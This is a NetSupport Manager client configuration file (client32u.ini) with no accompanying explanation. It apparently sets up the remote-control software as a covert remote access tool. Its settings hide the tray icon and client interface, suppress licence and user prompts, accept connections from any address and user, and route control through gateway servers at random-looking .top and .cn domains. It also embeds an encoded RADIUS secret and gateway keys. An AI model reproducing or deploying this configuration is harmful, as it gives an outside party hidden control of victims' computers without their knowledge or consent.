0x4d622bc6

[Client]
_present=1
AlwaysOnTop=1
DisableChat=1
DisableChatMenu=0
DisableClientConnect=0
DisableDisconnect=0
DisableGeolocation=0
DisableLocalInventory=0
DisableMessage=1
DisableRememberPassword=0
DisableReplayMenu=0
DisableRequestHelp=0
HideWhenIdle=1
LegacyControls=1
Protocols=3
RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA
RoomSpec=Eval
ShowUIOnConnect=0
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
Usernames=*
ValidAddresses.HTTP=*
ValidAddresses.IPX=*
ValidAddresses.TCP=*

[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[General]
BeepUsingSpeaker=0

[HTTP]
CMPI=60
GatewayAddress=dsauvsiv.top:443
SecondaryGateway=sdjbizirebz.cn:443
gsk=EG9M=NCAGE<H@IFC
gskmode=0
GSK=EG9M=NCAGE<H@IFC
GSKX=EG9M=NCAGE<H@IFC
MinimumEncryption=1
